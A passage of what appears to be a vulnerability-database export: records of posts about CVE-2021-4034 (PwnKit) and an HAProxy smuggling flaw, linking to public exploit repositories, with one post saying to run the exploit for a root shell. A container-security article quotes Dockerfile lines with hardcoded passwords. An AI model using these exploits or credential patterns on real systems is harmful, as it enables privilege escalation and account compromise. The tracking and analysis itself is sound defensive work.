\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438. \u041d\u0430\u043f\u043e\u043c\u043d\u0438\u043c, \u0447\u0442\u043e \u044d\u0442\u0430 \u0431\u0440\u0435\u0448\u044c \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0432\u0441\u0435\u0445 \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u043e\u0432 Linux. PwnKit \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c CVE-2021-4034, \u0435\u0439 \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u043b\u0438 7,8 \u0431\u0430\u043b\u043b\u0430 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS. \u041e \u0431\u0430\u0433\u0435 \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u0432 \u044f\u043d\u0432\u0430\u0440\u0435, \u043a\u043e\u0433\u0434\u0430 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u043b\u0438, \u0447\u0442\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c pkexec \u0434\u043b\u044f \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0430\u0432 \u0434\u043e root.\n\nLife hack \ud83d\udc48", "creation_timestamp": "2022-06-29T10:35:08.000000Z"}, {"uuid": "886bae7a-6555-4848-aff2-c8b65c9f3ac6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/BugCod3/155", "content": "CVE-2021-4034\n\nOne day for the polkit privilege escalation exploit\n\nJust execute make, ./cve-2021-4034 and enjoy your root shell.\n\nGitHub\n\n#CVE #POC\n\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\u2796\n\ud83d\udc64 T.me/MRvirusIRBOT\n\ud83d\udce2 T.me/BugCod3", "creation_timestamp": "2023-03-08T16:58:29.000000Z"}, {"uuid": "62e392b7-8586-4e45-a513-70784fa2bcae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8742", "content": "#exploit \n1. CVE-2021-40346:\nHAProxy HTTP Smuggling\nhttps://github.com/knqyf263/CVE-2021-40346\n\n2. CVE-2023-26045:\nNodeBB Forum Software RCE Flaw\nhttps://securityonline.info/cve-2023-26045-nodebb-forum-software-remote-code-execution-flaw", "creation_timestamp": "2023-07-27T13:26:17.000000Z"}, {"uuid": "9af3bcb7-cbc8-47c9-bf10-23bb705ac2b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/Cw-8f6XBMRwXm0NZXZLZx8ENXhdsQ-cUeYAgFfuSQJbZZ-s_", "content": "", "creation_timestamp": "2022-01-26T02:05:24.000000Z"}, {"uuid": "fa6db683-2ae4-4143-89ca-f397bc3dbb95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/XMcqRaf1-G5t77NTQ32_vFZdK1A5BAseyCkvasdiz4bmnBfo", "content": "", "creation_timestamp": "2022-01-29T00:38:22.000000Z"}, {"uuid": "dd620892-0e0f-4e26-ace8-e7227d15d884", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "exploited", "source": "Telegram/dgIX9-JNHvQPffFxnFjGM89P7cQGo13PHRh9h44qokhu7exZ", "content": "", "creation_timestamp": "2022-09-13T08:47:38.000000Z"}, {"uuid": "445369fb-1d96-4d79-8731-0b6d60795bc5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/arvin_club/5766", "content": "Self-contained exploit for CVE-2021-4034\u00a0\nhttps://github.com/ly4k/PwnKit/blob/main/README.md", "creation_timestamp": "2022-09-06T20:21:02.000000Z"}, {"uuid": "676c2087-2912-4e68-b855-3490b9c0548f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/secinfosex/42", "content": "\u2b55\ufe0f CVE-2021-4034: pwnkit: Local Privilege Escalation in polkit's pkexec\n\n\u0412\u043d\u0435\u0437\u0430\u043f\u043d\u043e \u043f\u043e\u0434\u044a\u0435\u0445\u0430\u043b\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 (LPE) \u0434\u043e \u0440\u0443\u0442\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043b\u0438\u043d\u0443\u043a\u0441 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445, \u0437\u0430 \u0441\u0447\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u043f\u043e-\u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0443\u0442\u0438\u043b\u0438\u0442\u044b pkexec \u0441 \u0441\u0443\u0438\u0434\u043d\u044b\u043c \u0431\u0438\u0442\u043e\u043c.\n\n\u0411\u0430\u0433\u0430 \u0441 \u043f\u0435\u0440\u0432\u043e\u0433\u043e \u043a\u043e\u043c\u043c\u0438\u0442\u0430 \u0430\u0436 \u0432 \u043c\u0430\u0435 2009 \u0433\u043e\u0434\u0430, \u0438 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Qalys \u0437\u0430\u044f\u0432\u043b\u044f\u044e\u0442, \u0447\u0442\u043e \u0445\u043e\u0442\u044c \u044d\u0442\u043e \u0438 \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u0430\u043c\u044f\u0442\u0438, \u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u044b\u0441\u0442\u0440\u0430, \u043d\u0430\u0434\u0435\u0436\u043d\u0430, \u0438 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u0430 \u043e\u0442 \u0430\u0440\u0445\u0438\u0442\u0435\u043a\u0442\u0443\u0440\u044b.\n\n\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 PATH \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u0438\u0434\u0430 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0442 \u0443\u0441\u043b\u043e\u0432\u0438\u044f \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0433\u0440\u0430\u043d\u0438\u0446 envp[0], \u0447\u0442\u043e \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0432\u043d\u0435\u0434\u0440\u0438\u0442\u044c \u043a\u0430\u043a\u0431\u044d \u0441\u0432\u043e\u044e \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u0443\u044e LD_PRELOAD \u043f\u0440\u044f\u043c \u0432 \u0441\u0443\u0438\u0434\u043d\u0438\u043a.\n\u041f\u0440\u043e\u0441\u0442\u043e \u0434\u043e \u0436\u0443\u0442\u0438.\n\n\u042d\u0442\u043e \u0438 \u0434\u0435\u043b\u0430\u0435\u0442 CVE-2021-4034 \u0432\u0435\u0441\u044c\u043c\u0430 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u043e\u0439, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u043e\u0439 \u0441 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435\u043c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 Linux.\n\n\ud83e\udddf\u200d \u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0443\u0436\u0435 \u0432 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u044f\u0445.\n\n\u0411\u044b\u0441\u0442\u0440\u044b\u0439 \u0444\u0438\u043a\u0441:\n\ud83d\udd25chmod 0755 /usr/bin/pkexec\n \n\u0418\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435:\nhttps://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683\n\n\u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e: \n\ud83d\udc49 https://www.openwall.com/lists/oss-security/2022/01/25/11", "creation_timestamp": "2022-01-26T07:47:03.000000Z"}, {"uuid": "a87779d3-2d3f-4291-a03f-399aa99c0091", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/5324", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (Jan 1-31)\n\nCVE-2021-44228 - Apache Log4j2\nCVE-2021-40444 - Microsoft MSHTML RCE\nCVE-2021-4034 - LPE vuln was found on polkit's pkexec utility\nCVE-2022-0185 - Linux Kernel Container Escape in Kubernetes\nCVE-2022-21907 - HTTP Protocol Stack RCE\nCVE-2022-21882 - Win32k Window Object Type Confusion\nCVE-2021-20038 - SonicWall SMA-100 Unauth RCE\nCVE-2021-45467 - CWP CentOS Web Panel preauth RCE\nCVE-2021-42392 - Unauth RCE in H2 Database Console\nCVE-2022-21658 - Vulnerability in Rust", "creation_timestamp": "2024-10-15T10:29:54.000000Z"}, {"uuid": "27c465ba-bd19-4c1f-a372-476766588f69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/5288", "content": "#exploit\nCVE-2021-4034:\nPwnKit: LPE Vulnerability in polkit\u2019s pkexec\nhttps://github.com/berdav/CVE-2021-4034\nhttps://github.com/Ayrx/CVE-2021-4034\nhttps://github.com/arthepsy/CVE-2021-4034\n\n2. CVE-2022-0185:\nLinux Kernel Can Allow Container Escape in Kubernetes\nhttps://github.com/Crusaders-of-Rust/CVE-2022-0185", "creation_timestamp": "2022-01-27T18:51:06.000000Z"}, {"uuid": "9b053be6-aad0-4cfb-aa00-a842f0513cd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-40346", "type": "published-proof-of-concept", "source": "https://t.me/dc7342/42353", "content": "Critical Vulnerability in HAProxy (CVE-2021-40346): Integer Overflow Enables HTTP Smuggling\n\ud83d\udc64 by Ori Hollander and Or Peles\n\nThe vulnerability,\u00a0CVE-2021-40346, is an Integer Overflow, triggerable via the Content-Length HTTP header, that makes it possible to conduct HTTP Request Smuggling attacks.\n\n\ud83d\udcdd Contents:\n\u2022 Technical Background\n \u2022 HTTP Request Smuggling\n \u2022 HAProxy\u2019s HTTP request processing phases (simplified)\n\u2022 Attack Scenario \u2013 Bypassing http-request ACLs\n \u2022 What happens inside HAProxy\n \u2022 Getting the HTTP response for the smuggled request\n \u2022 Attack demonstration \u2013 ACL bypass\n\u2022 Vulnerability Details\n\u2022 Automating the Discovery\n\u2022 Fixes and Workarounds\n\nhttps://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/", "creation_timestamp": "2021-09-09T14:24:36.000000Z"}, {"uuid": "43e3ead0-8e71-46a9-bc9a-8ad9fbb6610d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/dc7342/47837", "content": "\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 CVE-2021-4034 \u2014 github.com/berdav/CVE-2021-4034\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Debian \u0438 \u0442\u043f. \u041d\u0435\u0434\u043e\u0447\u0435\u0442 \u0441\u043a\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 polkit-pkexec, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c setuid \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0431\u044b\u0447\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0441 \u043f\u0440\u0435\u0434\u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u043c\u0438 \u043f\u043e\u043b\u0438\u0442\u0438\u043a\u0430\u043c\u0438.\n\n\u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0431 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0432\u0447\u0435\u0440\u0430 (25.01.2022), \u0447\u0430\u0441\u0442\u044c \u0444\u0438\u043a\u0441\u043e\u0432 \u0443\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043e.", "creation_timestamp": "2022-01-26T15:36:53.000000Z"}, {"uuid": "abc80c66-3775-4698-9030-ae28b03d8abd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/5529", "content": "Traitor - Exploit Low-Hanging Fruit Automatically\n\n- Nearly all of GTFOBins\n- Writeable docker.sock\n- CVE-2022-0847 (Dirty pipe)\n- CVE-2021-4034 (pwnkit)\n- CVE-2021-3560\n\nGithub\n\n#Linux #Exploit #Tools \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-09-26T09:46:31.000000Z"}, {"uuid": "c96e388e-4150-42b3-87f5-8af3c27b5500", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://t.me/GithubRedTeam/85144", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #Exploit #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a pwnkit-helper\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kaisen-bot\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 2 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 2\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-21 03:57:52\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\ud83d\ude80 Enhance your penetration testing with PwnKit Helper, a simple tool for exploiting the CVE-2021-4034 vulnerability in pkexec for local privilege escalation.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-21T04:01:06.000000Z"}, {"uuid": "ac0c61a9-8c3b-4130-bf1d-8ac1f66733b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/SM41ZgDjE5GCx8_K5BndOjKQZfdnq7khstyXQtIQ9aWd83s", "content": "", "creation_timestamp": "2026-05-19T21:00:04.000000Z"}, {"uuid": "4eda8fd9-1581-4973-8482-1a5f0215003f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "published-proof-of-concept", "source": "Telegram/LRuVHO_NRtLslMv_pxl3JYoJM5ygIHd_ktikilExPtpHxGM", "content": "", "creation_timestamp": "2026-05-20T15:00:07.000000Z"}, {"uuid": "aeac078f-60ea-4a4b-9324-104aeb50e277", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-4034", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-1122ebc0-12145c4779ccb07a", "content": "What\u2019s in the container? Analyzing vulnerabilities, risks and protection with Kaspersky Container Security and the KIRA AI assistant\nIntroduction\nContainerization using Docker has become firmly established in modern development standards, significantly increasing the speed and convenience of deploying various services. Developers often use ready-made Docker images, making only minimal changes. The largest repository of container images is the Docker Hub service.\nContainer-hosted infrastructure is an attractive target for attackers. At a minimum, a compromised container can be used for DDoS attacks, cryptocurrency mining, or traffic proxying. The list of threats does not end there: once an attacker gains control of a container, they can steal or destroy data directly from it, access neighboring containers, or even attempt to escape the container, compromising the entire enterprise network.\nAt the same time, the infrastructure inside containers is typically updated less frequently and may contain outdated and vulnerable software versions. When deploying third-party images or modifying them for a specific environment, it is easy to make configuration errors that attackers can later exploit. And due to the architectural characteristics of containers, developers often face constraints when preparing images; to overcome these, they may resort to insecure solutions they find online.\nIn other words, containerized infrastructure can be both the simplest and the most lucrative target to exploit. Therefore, its security requires heightened attention. To minimize the risk of successful attacks on container infrastructure, it is essential to check the final Docker images, including all underlying layers, for vulnerabilities and misconfigurations. The easiest way to do this is by analyzing the Dockerfile; however, it is not always available for inspection. Moreover, it typically defines how to build layers on top of a base image from an external repository whose reliability cannot be guaranteed.\nImage analysis results in Kaspersky Container Security\nTo help users identify insecure configurations and potential vulnerabilities within them, we have added our AI assistant to Kaspersky Container Security.KIRA (the assistant\u2019s name) uses artificial intelligence to analyze the image and identify potential issues within, along with recommendations on how to fix them.\nAs part of this study, we asked KIRA to analyze a number of popular community images, and later in this article, we\u2019ll show you the results.\nSoftware vulnerabilities and compromise of update sources\nOne of the key security issues with using pre-built images is that developers do not update them in a timely manner. A Docker image is, by its very nature, a snapshot of a specific Linux distribution after packages have been installed on it. However, in most cases, it does not receive security updates on its own, unlike traditional Linux servers, where these updates are automatically installed by specialized services, such as unattended-upgrades in Debian-based distributions and dnf-automatic in RedHat-based distributions.\nTo apply updates to a Docker image, it must be rebuilt and redeployed. Often, this process is not automated, and some updates require additional effort to verify their correct operation, modify configurations when upgrading to new software versions, and so on. As a result, many popular images do not receive timely updates, which significantly increases the risks associated with their use.\nAn image that was secure at build time accumulates vulnerabilities as they are discovered in the packages installed within it, which over time significantly increases the opportunities for a successful attack on the container.\nVulnerable versions of web applications and network services accessible from the internet immediately become targets of various malicious campaigns. For example, just one day after the discovery of the CVE-2025-55182 vulnerability in React Server Components, our honeypots recorded numerous attack attempts related to this vulnerability. It was adopted by operators of many malicious campaigns, ranging from classic cryptocurrency miners to variants of Mirai and Gafgyt. Attackers are constantly adding new distribution methods and can use dozens of exploits targeting various vulnerabilities and configuration errors in popular services. Often, the same vulnerabilities are used in self-propagation mechanisms from already compromised hosts. For example, in a malicious campaign to spread the Dero miner, attackers use infected containers to automatically search for and infect new targets.\nIn addition to vulnerabilities that can be exploited remotely, attackers are rapidly adding local vulnerabilities to their arsenal, used to gain root privileges and escape the container: in the Kinsing malware campaign, attackers used CVE-2023-4911 (Looney Tunables) to elevate privileges, and in the perfctl campaign, the CVE-2021-4034 (PwnKit) vulnerability was used for the same purpose. The access gained was used to install a rootkit that hides the presence of perfctl on the system.\nTo assess the situation with unpatched vulnerabilities in containers, we took a random sample of 100 images, which included various popular solutions with 10,000 to 1 million downloads on DockerHub. In the 64 images we scanned, we found outdated software versions with critical vulnerabilities. For example, some images contained the CVE-2025-49844 vulnerability in the Redis server, leading to RCE by leveraging a vulnerability in the Lua parser; the current CVE-2026-24061 vulnerability in nginx, which in some configurations leads to a server process crash, and with ASLR disabled, again, to RCE; vulnerabilities CVE-2025-32463 in sudo and CVE-2023-4911 in glibc, allowing an attacker to gain root privileges with local access. At the same time, only one in ten Docker images from the analyzed sample is fully up to date.\nTOP 10 Critical Vulnerabilities with PoC/Exploits available as shown in the Kaspersky Container Security Dashboard\nIt is worth noting that, of course, not every discovered vulnerability can be directly exploited by attackers. A practical risk arises when the vulnerable application or library is actually in use, and the conditions necessary for exploitation \u2013 which vary significantly from vulnerability to vulnerability \u2013 are met. Nevertheless, updates must not be ignored, as the risk of vulnerabilities being exploited \u2013 both individually and in various combinations \u2013 cannot be predicted in each specific case, and even vulnerabilities that seem harmless at first glance can ultimately pose a serious risk of compromise.\nA record number of vulnerabilities in a single image\nHowever, frequent updates have a downside. Every rebuild that downloads new packages from source repositories introduces an additional risk of a supply chain attack \u2013 a compromised dependency or a modified base image could silently inject malicious code into your environment precisely through an update. During our analysis of images from the sample, we did not find any signs of supply chain attacks. However, in March 2026, a supply chain incident occurred in the Trivy and LiteLLM projects. In the case of Trivy, the infected file was injected directly into the container image in the official repositories.\nDetecting potentially malicious software using one of the images as an example\nThis leads to a difficult choice: infrequent updates leave known vulnerabilities unpatched within the image, while frequent updates increase the risk of supply chain compromise. Therefore, to protect your infrastructure, you need not only to regularly update base images but also to take a more comprehensive approach, specifically by pinning dependencies to known-good versions and scanning the resulting images for malware upon update.\nConfiguration vulnerabilities\nEven a container with a fully updated image can be compromised if it is configured incorrectly. Embedding keys and secrets in the image, disabling authentication in network services, default passwords, and insecure file access permissions \u2013 all of these can be exploited by attackers in one way or another to achieve their goals.\nInsecure image configurations detected by KCS based on rules\nThe situation is exacerbated by the fact that errors may be introduced by the authors of the original image, which complicates their detection, as this requires analyzing every layer and the command that generated it. As with vulnerabilities, not every configuration error leads to compromise: it all depends on the container\u2019s role, its network accessibility, and many other factors. But the very use of insecure settings will sooner or later lead to errors appearing in images where their consequences will be significantly more dangerous.\nStandard rules are often insufficient for analyzing problematic configurations. To gain a deeper understanding of the context and assess potential risks, AI tools can be used. Later in this section, we will examine examples of typical insecure configurations we discovered while scanning public images from Docker Hub, along with the descriptions of issues and risk mitigation methods provided by the KIRA AI assistant.\nExample of container analysis using KIRA\nInsecure handling of credentials\nUse of default passwords\nIn some cases, containers may use default passwords set via environment variables or directly in Dockerfile. If these passwords are not overridden, attackers will be able to access the application by using the default password.\nRUN |1 DEBIAN_FRONTEND=noninteractive /bin/sh -c echo [removed]:[removed] | chpasswd\nAccording to KIRA\u2019s analysis, the user\u2019s password is stored in plain text in the image layer history. Anyone who gains access to the image \u2013 whether through a public registry, a compromised build environment, or other means \u2013 will be able to extract the password. If SSH or another form of interactive access is enabled in the container, this could lead to its complete compromise and allow attackers to move laterally within the infrastructure.\nPasswords may be present in environment variables. Consider the following Dockerfile snippet:\nENV SERVERNAME=localhost WWW_PATH_CONF=/etc/apache2/apache2.conf WWW_PATH_ROOT=/var/www HTTPS=on PKP_CLI_INSTALL=0 PKP_DB_HOST=db PKP_DB_NAME=pkp PKP_DB_USER=pkp PKP_DB_PASSWORD=changeMePlease PKP_WEB_CONF=/etc/apache2/conf-enabled/pkp.conf PKP_CONF=config.inc.php PKP_CMD=/usr/local/bin/pkp-start\nIn this example, the environment variable PKP_DB_PASSWORD is set to changeMePlease. If the user forgets to override it, the application will use the password that can be obtained from Dockerfile.\nLet\u2019s look at another image:\n/bin/sh -c #(nop) ENV MOODLE_URL=<a href=\"http://0.0.0.0/\">0.0.0.0</a> MOODLE_ADMIN admin MOODLE_ADMIN_PASSWORD [removed] MOODLE_ADMIN_EMAIL admin@example.com MOODLE_DB_HOST MOODLE_DB_PASSWORD MOODLE_DB_USER MOODLE_DB_NAME MOODLE_DB_PORT 3306\nFor this image, Dockerfile specifies that the administrator password is hardcoded in the ENV directive and remains in the image metadata (layer history, docker inspect). Anyone who gains access to the image (registry, build cache) will be able to extract this secret and compromise the account.\nTo eliminate these risks, ensure that no passwords are specified in Dockerfile. If authentication is required, you can use orchestrator mechanisms (secrets) or generate a temporary password when starting the container via the entrypoint script, without saving it in the layers. We also recommend using mechanisms for securely passing secrets at runtime (Docker secrets, Kubernetes Secrets) or, as a last resort, passing them via --secret during the build with BuildKit, but under no circumstances should they be left in the final image.\nPassing passwords via command arguments\nIn some cases, passwords may be exposed when passed via command-line arguments, as these arguments are visible to all users on the system:\n/bin/sh -c #(nop) HEALTHCHECK &{[\"\"CMD-SHELL\"\" \"\"mysql --protocol TCP -u\\\"\"root\\\"\" -p\\\"\"$MYSQL_ROOT_PASSWORD\\\"\" -e \\\"\"SELECT 1;\\\"\"\"\"] \"\"15s\"\" \"\"30s\"\" \"\"0s\"\" '\\x05'}\nIn the example provided, the MySQL superuser password is passed into the healthcheck command in plaintext, making it visible when viewing the process list (ps aux), in audit logs, and in monitoring systems. If the attacker gains read access to the container\u2019s processes or logs, they can extract the password and gain full control of the database.\nTo fix this issue, the healthcheck should use a local connection via a Unix socket with default authentication (if the auth_socket plugin is configured for root), or create a dedicated user with minimal privileges (e.g., only USAGE), without a password or with a password passed via a secure file (--defaults-file with restricted permissions). You can also use the MYSQL_PWD environment variable for healthcheck authentication, but it remains visible in /proc.\nPrivilege escalation in the container\nOne of the most common vectors for initial compromise of Linux systems is RCE in web applications and network services. Typically, these services have minimal privileges, which complicates attackers\u2019 subsequent actions: dumping credentials, covering their tracks, attempting to escape the container, and much more.\nThe situation worsens significantly if the attacker gains root privileges, as this allows them to fully control all processes within the container, conceal their activity, and use methods to escape the container. For example, they can compromise the host if the container is privileged, a Docker socket is mounted inside it, or other insecure configurations and vulnerabilities exist that cannot be exploited with standard user privileges.\nSimilarly, this simplifies network attacks on neighboring containers, the orchestrator, and various internal services, making this configuration error a potential link in the chain for compromising the entire network.\nAttacks on sudo\nOne of the simplest privilege escalation methods is executing arbitrary commands as root using sudo without entering a password. Consider the following example:\n/bin/sh -c set -xe; apt-get update && apt-get -y 